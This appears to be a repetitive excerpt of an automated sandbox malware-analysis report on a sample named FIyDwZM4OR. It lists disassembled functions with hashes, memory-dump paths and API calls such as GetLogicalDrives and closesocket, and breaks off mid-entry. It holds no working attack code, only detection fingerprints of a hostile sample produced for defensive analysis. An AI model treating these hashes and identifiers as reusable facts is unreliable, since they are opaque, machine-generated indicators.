                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 7d33fd25cec8b70a9ca2c72db862d7e7aa6bdbb56aee24a170d1bcd455304fcb
                                                              • Instruction ID: 1e225f4f8e939c96903b52a10960a4c882aab6ea5feea158ed496378c88e84f1
                                                              • Opcode Fuzzy Hash: 7d33fd25cec8b70a9ca2c72db862d7e7aa6bdbb56aee24a170d1bcd455304fcb
                                                              • Instruction Fuzzy Hash: 2D51C5EB26C125BE710AC0851B54EFB6AEFE1CF770B328426F407D66C2E3984E4A5171
                                                              Function 07130076 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 237COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 13eba557537f9173668ae61c23883b1cf437b739ee0046db44459749b19016cf
                                                              • Instruction ID: 0a1e8b28fcf3407d8317a070ef5a4bd1dc1325bcb302de797c3c18d38de1261a
                                                              • Opcode Fuzzy Hash: 13eba557537f9173668ae61c23883b1cf437b739ee0046db44459749b19016cf
                                                              • Instruction Fuzzy Hash: 5841E9EB26C121FD715AC0851B54AFB6AEFE5CF770F328426F407D6582E3984E4A1171
                                                              Function 07130058 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 232COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 7cee3dbd3ba9d52d4dda8504d11e1e8d878f21ee42d2871b7a1a3e7076632ca7
                                                              • Instruction ID: 8837ed025ad08be6609f5b64c37618c4e59961cd75b180164b1943ac68037d38
                                                              • Opcode Fuzzy Hash: 7cee3dbd3ba9d52d4dda8504d11e1e8d878f21ee42d2871b7a1a3e7076632ca7
                                                              • Instruction Fuzzy Hash: C741A7EB26C121BD710AC0851B54EFB5AEFE5CF770F328426F407D6582E3984E491171
                                                              Function 07130130 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 226COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: d8f958b68943a295d17f981c3a4480dd8c8d9a3eed26019a7d556b161c34a5ec
                                                              • Instruction ID: a10e92e941145c4e46dd8b1f6ec14f87b7772e35dba126bf26e03e1f8fed2eb5
                                                              • Opcode Fuzzy Hash: d8f958b68943a295d17f981c3a4480dd8c8d9a3eed26019a7d556b161c34a5ec
                                                              • Instruction Fuzzy Hash: 9E41F7E716C151BEB20AC1851B54AFB6BAFE6CF730B328426F407D7582E3984A494271
                                                              Function 071300D4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 215COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 35e122e1bfbbb998f8510167ec79c5c8445c7483ba66562a9946aa285ff3d0cd
                                                              • Instruction ID: 4679d17791bc306a0d70040ef671a3979a2a6eb8269d443aeb03f7c4279ff7a4
                                                              • Opcode Fuzzy Hash: 35e122e1bfbbb998f8510167ec79c5c8445c7483ba66562a9946aa285ff3d0cd
                                                              • Instruction Fuzzy Hash: 1F41D7E716C111BE720AC1851B54EFB6BAFE5CF730B328426F407D7582E3984A495271
                                                              Function 071300BF Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 17643fc9dd80780eb593d8e75a5c48101f0ac5bd40d44bb9b1742d47faf4d357
                                                              • Instruction ID: 799479823c3c8f410f4a9439c47c0b2395140a7ae9e5bd89b784531a033df175
                                                              • Opcode Fuzzy Hash: 17643fc9dd80780eb593d8e75a5c48101f0ac5bd40d44bb9b1742d47faf4d357
                                                              • Instruction Fuzzy Hash: 5C41A5EB26C121BD710AC1852B54EFB5AEFE5CF770F328426F40BD6682E7988E491171
                                                              Function 0713009E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 209COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 5e96bd050c981a3cd141b0de02a4278aa619f50237c069a85033ecfbeeffb860
                                                              • Instruction ID: 65534debdff36648acd0ffb1290f1a0f950e6c7b53401829d9c9bc0dc4653027
                                                              • Opcode Fuzzy Hash: 5e96bd050c981a3cd141b0de02a4278aa619f50237c069a85033ecfbeeffb860
                                                              • Instruction Fuzzy Hash: 7C41D9E716C121BD720AC1851B54EFB6AEFE5CF770F328426F407D6582E3984E495171
                                                              Function 07130101 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 207COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 3957b9902cc4d255e07279ff7a8a977adf522d677d82711bc995d2e8a0fcb9bf
                                                              • Instruction ID: a72452b9144796d4a07e3245a373b537fa150d143ee57c45bc891e3599c923da
                                                              • Opcode Fuzzy Hash: 3957b9902cc4d255e07279ff7a8a977adf522d677d82711bc995d2e8a0fcb9bf
                                                              • Instruction Fuzzy Hash: 4441B4EB26C121BE714AC0851B54EFB5AEFE5CF770F328426F40BD6682E7988E491171
                                                              Function 07130156 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 452f3e6d23733c360db8de245308d7e62ef8d9d8e4329b221391cd6f542adaab
                                                              • Instruction ID: 9f4e6345f7051b2cc0c6fdf8d756c4d5f0f243d58cf0be1c92b2aa056fa8e033
                                                              • Opcode Fuzzy Hash: 452f3e6d23733c360db8de245308d7e62ef8d9d8e4329b221391cd6f542adaab
                                                              • Instruction Fuzzy Hash: EE41B6EB16C121BD711AC1852B54EFB5AEFE5CF770F328426F40BD6682E3988E491171
                                                              Function 0713016C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 196COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: c41c412fe3a329edf8a9505dd7e4155c2b9f45a65320dd6bf415ac420b23baef
                                                              • Instruction ID: 637a3533a878b9f06d5fc3276ffc0a8a231cfcead94ab6b7b85a9b039a1b6f74
                                                              • Opcode Fuzzy Hash: c41c412fe3a329edf8a9505dd7e4155c2b9f45a65320dd6bf415ac420b23baef
                                                              • Instruction Fuzzy Hash: 52412BE725C261BEB20AC1511B54AFB6BEFE5CB730F328427F407D6582D3984A495231
                                                              Function 07130143 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 3d97f41175883fe8a48650dc58fa952880941a299d5815a88368e37b77b896a5
                                                              • Instruction ID: 50c93e3d2deb0ba9de5a2013f425bd2352998ad1a2d3d9e4b8fef54c726d1463
                                                              • Opcode Fuzzy Hash: 3d97f41175883fe8a48650dc58fa952880941a299d5815a88368e37b77b896a5
                                                              • Instruction Fuzzy Hash: 8D31D7EB16C121BE710AC1852B54EFB5AEFE5CF730F328426F407D6682E7984E491231
                                                              Function 071301B2 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: c2e0e4c745ee5b24beef62a25b934958607ae8ead23d3c81746ed9ea5fc3a0af
                                                              • Instruction ID: a20814deda861fa7195e981b13f66993b146ad12b86704ee067e606123f8bcf5
                                                              • Opcode Fuzzy Hash: c2e0e4c745ee5b24beef62a25b934958607ae8ead23d3c81746ed9ea5fc3a0af
                                                              • Instruction Fuzzy Hash: FB3194EB16C121BE724AC1852B54EFB6AAFE5CF730B328426B407D6686D7984A491231
                                                              Function 00E9F7B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: CloseEvent
                                                              • String ID: multi.c
                                                              • API String ID: 2624557715-214371023
                                                              • Opcode ID: dc73421b61a89a0e70098b19ead6703a54ec4e39db77ff752d29eaae3da1b5df
                                                              • Instruction ID: 362e067d90b846b5e2868e777f8bd13743aca4121db49305b2c02277741845aa
                                                              • Opcode Fuzzy Hash: dc73421b61a89a0e70098b19ead6703a54ec4e39db77ff752d29eaae3da1b5df
                                                              • Instruction Fuzzy Hash: 3E51E6B1D143045BEF60AA709C42BA736E8AF51358F081478E88DFB253FB75E909C792
                                                              Function 071301C4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 02d3da4318247deafd3133fdf86ed96587c7909ba51e6e904ab23ca40a5df9b8
                                                              • Instruction ID: 3b860e97bdffeee3fae974fab63843960cb5de7a9ab068492cbca2148c4132c3
                                                              • Opcode Fuzzy Hash: 02d3da4318247deafd3133fdf86ed96587c7909ba51e6e904ab23ca40a5df9b8
                                                              • Instruction Fuzzy Hash: 373186EB16C121BE714AC1852B54EFB6AEFE6CF730B328426B507D2686D7984F491231
                                                              Function 07130260 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: d3338a9b82abb400d59a4ebe33316ddd7e3b04d8f66dc7f55a8fe58630907455
                                                              • Instruction ID: 20a9789655e77809ad48612704e208ce7a2615f70a7d4828040f8b6b105a1b18
                                                              • Opcode Fuzzy Hash: d3338a9b82abb400d59a4ebe33316ddd7e3b04d8f66dc7f55a8fe58630907455
                                                              • Instruction Fuzzy Hash: 703194EB16D111BEB50AC1956754EFBABAFE6CF730B328027F407D2642D3984A491231
                                                              Function 071301D1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 09ed26d531616edecf09c3b4bc8c49d27498666ba30727f3dc3c492556355fb1
                                                              • Instruction ID: 3974c6c6a32434bebca33ce420ae50455f03081912ff5e19e6acf190332ae18d
                                                              • Opcode Fuzzy Hash: 09ed26d531616edecf09c3b4bc8c49d27498666ba30727f3dc3c492556355fb1
                                                              • Instruction Fuzzy Hash: 5A3186EB16C115BE710AC5816B54EFB5AEFE6CF730B328426F407D2686D7984E491231
                                                              Function 071301E1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 7166a730819dd819271c0d0b3b3430ad1addbba79d3ab62c528b529cb9a5aa66
                                                              • Instruction ID: aae0f44b38018747d3767775384f8a3c1ba0b4aba802e115053205853d616b24
                                                              • Opcode Fuzzy Hash: 7166a730819dd819271c0d0b3b3430ad1addbba79d3ab62c528b529cb9a5aa66
                                                              • Instruction Fuzzy Hash: A731A8EB16C111BEB106C1856B54AFB6BEFE6CF730F328426F407D2682D3980E491231
                                                              Function 07130200 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: d808896e3f8ad0dd0a53ab8c3f6f75c2317904a96d5bf77ae3a3bf92054b857a
                                                              • Instruction ID: 0027d5daebdd9b9f5e0243b8fe3fe1589af6f67fc0864d8a3592fd2b87ef9b94
                                                              • Opcode Fuzzy Hash: d808896e3f8ad0dd0a53ab8c3f6f75c2317904a96d5bf77ae3a3bf92054b857a
                                                              • Instruction Fuzzy Hash: FC3184EB16C111BEB106C1856B54AFB6AAFE6CF730B328427F507D2646D3984F491231
                                                              Function 07130233 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 09d292024cf244b99b4b1d5a44dc76390f92c6cf083059753fc026c3fd56397f
                                                              • Instruction ID: a0cfcdcc182847ad9074a0dd3b2dc7b84d3bb709d70c416bafb2b22962031d21
                                                              • Opcode Fuzzy Hash: 09d292024cf244b99b4b1d5a44dc76390f92c6cf083059753fc026c3fd56397f
                                                              • Instruction Fuzzy Hash: D131C4E715C210BEB606C1816B54AFB6BAEE6CB730B32802BF407D2582D3984F4A1231
                                                              Function 07130220 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: b37a6702d141ef6995a5a8d7c5f68312130672ab4466640d2401a2dd3122bf61
                                                              • Instruction ID: 581a6803ff974cd46d5a18d3d663807f3d8f42ffc9b5cce9b52d1366178e7e5b
                                                              • Opcode Fuzzy Hash: b37a6702d141ef6995a5a8d7c5f68312130672ab4466640d2401a2dd3122bf61
                                                              • Instruction Fuzzy Hash: 232162EB16C111BEB109C1816B54EFB6AEFE6CF730B328427F407D1686D7980E491235
                                                              Function 0713028F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: d664ce9560d6178c51e083b3fd24c43ec2c464b4ac3aa9f6545fb93459a29185
                                                              • Instruction ID: cfcdef4320970d424f172c41a61650709a9868f6920a2d223bafd5393807756c
                                                              • Opcode Fuzzy Hash: d664ce9560d6178c51e083b3fd24c43ec2c464b4ac3aa9f6545fb93459a29185
                                                              • Instruction Fuzzy Hash: C82106F712C210AEB606C5916B54AFA6BAEE6CB730B32846AF406D2582D35C0E4E4231
                                                              Function 071302AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: c2c4b102f90c89938cee4dff69d50a6a7ee84081c045623c56acba7042653d6c
                                                              • Instruction ID: abdcb662eab0babc5327415407e06e0a2233bc8f081b8041f482cf77b9ca365b
                                                              • Opcode Fuzzy Hash: c2c4b102f90c89938cee4dff69d50a6a7ee84081c045623c56acba7042653d6c
                                                              • Instruction Fuzzy Hash: 6821C3EB22D211BEB205C1912B14EFBABAEE1CB730B36C43AF407D1546D3984E4E5231
                                                              Function 071302C1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 148895a2cb20f994e99962bab2ea97a85d216b85a30893b854daaa52c3a22bf5
                                                              • Instruction ID: 10b1f2ebddabe41f23ec93e350cc33b5aea1702a88acc5ce68bbdc7f114e8849
                                                              • Opcode Fuzzy Hash: 148895a2cb20f994e99962bab2ea97a85d216b85a30893b854daaa52c3a22bf5
                                                              • Instruction Fuzzy Hash: 6E11B1FB26C221BEB205C5912B14AFA6BEEE6CB730B32843BF407D1546D3980E4D1135
                                                              Function 071302D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: df54c99d73134800e77e5bca2bee3fb7e36b2ce7273e381183df51c01525e97b
                                                              • Instruction ID: 4716dd57dca2de4c0f8659792d4d377bf0d780ba32b70547410c4903c6322b16
                                                              • Opcode Fuzzy Hash: df54c99d73134800e77e5bca2bee3fb7e36b2ce7273e381183df51c01525e97b
                                                              • Instruction Fuzzy Hash: 3911B4FB25C260BEB605C5916B14AFB6BAED6CB730B35C42BF406D1541D3980E4E1231
                                                              Function 071302F6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 071303F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799837447.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 46c8279ae901a93af634735b7e54941d8540f4650cefa67a82aa9af21e4f861e
                                                              • Instruction ID: 3c7036234c3a73980466da98654957f881b47203f3a627e28fe65f1c4eb47e17
                                                              • Opcode Fuzzy Hash: 46c8279ae901a93af634735b7e54941d8540f4650cefa67a82aa9af21e4f861e
                                                              • Instruction Fuzzy Hash: DC1173EB26C211BEB205C5916B54AFA6BAEE6CB730B31C437F407D2541D3984E491135
                                                              Function 00E978B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: fc15a4c3500c89b8af74b39ba74d3b5cb25f3b028ec80782286a6d048a58ac26
